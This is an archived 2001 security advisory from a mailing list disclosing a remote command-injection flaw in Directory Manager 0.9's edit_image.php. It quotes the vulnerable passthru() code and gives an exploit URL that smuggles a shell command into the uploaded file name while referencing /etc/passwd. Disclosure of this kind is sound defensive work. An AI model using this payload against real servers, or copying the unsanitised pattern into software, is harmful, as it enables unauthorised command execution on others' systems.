[UNIX] Directory Manager Arbitrary Command Execution

From: support@securiteam.com
Date: 09/07/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] Directory Manager Arbitrary Command Execution
Message-Id: <20010907064228.A6B53138C0@mail.der-keiler.de>
Date: Fri,  7 Sep 2001 08:42:28 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Directory Manager Arbitrary Command Execution
------------------------------------------------------------------------

SUMMARY

 <http://sourceforge.net/projects/directorymanage/> Directory Manager is a
tool for managing LDAP directory data. It includes a schema independent
editor, a schema viewer, and some pretty Views of the data. A security
vulnerability in the product allows attackers to execute arbitrary
commands on the server remotely.

DETAILS

Vulnerable systems:
Directory Manager 0.9

From edit_image.php:

if( !$dn ) Header( "Location: $defaultpage" );
..
if( is_file( $userfile ) && $userfile_name )
    {
    if( copy( $userfile, "/tmp/" . $userfile_name ) )
        {
                ...
        passthru( "/usr/bin/convert -scale 600x600 /tmp/$userfile_name
/tmp/$userfile_name.jpg" );
                ...
                unlink( "/tmp/$userfile_name.jpg" );

This allows us to arbitrary command into $userfile_name variable, for
example $userfile_name=;ls;. This will cause the passthrou to execute the
ls command, and unlink will complete successfully, thus returning the
directory listing.

Exploit:
http://victim.host/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20

Solution:
By default, this PHP is protected by the need to enter a valid username
and password. If this is not the case, place one.

ADDITIONAL INFORMATION

The information has been provided by <mailto:appelast@cdp.pl> Karol
Wiesek.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.